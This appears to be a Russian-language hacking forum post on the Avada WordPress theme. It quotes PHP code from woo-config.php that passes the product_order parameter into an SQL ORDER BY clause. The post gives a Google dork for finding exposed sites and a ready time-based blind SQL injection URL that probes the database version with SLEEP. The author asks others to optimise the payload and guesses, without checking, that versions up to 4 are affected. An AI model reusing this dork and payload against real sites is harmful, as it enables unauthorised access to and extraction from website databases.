Avada #1 Selling Theme of All Time (
190,000+ Satisfied Customers)
inurl:"product_orderby" (
Результатов: примерно 8 840 000 (0,63 сек.) )
./includes/woo-config.php
PHP код:
if ( isset( $_SERVER['QUERY_STRING'] ) ) {
parse_str( $_SERVER['QUERY_STRING'], $params );
}
$order = ! empty( $params['product_order'] ) ? $params['product_order'] : 'desc';
$order = strtoupper( $order );
$args['orderby'] = "sum_of_comments_approved DESC, average_rating {$order}, $wpdb->posts.post_date DESC";
Получается
Time-Based Blind SQL Injection:
Цитата:
|
http://site.com/shop/?product_orderby=rating&product_order=DESC,CASE+1+ WHEN+ASCII(substring(version(),1,1))=53+THEN+SLEEP (0)+ELSE+SLEEP(1)+END+ASC+--+1
|
Оптимизации запроса от гуру приветствуются 
В тонкости не вдавался, похоже что спит так:
количество сортируемых товаров * sleep(). Подверженные версии, скорее всего, <= 4, включая последнюю. Точно не проверял.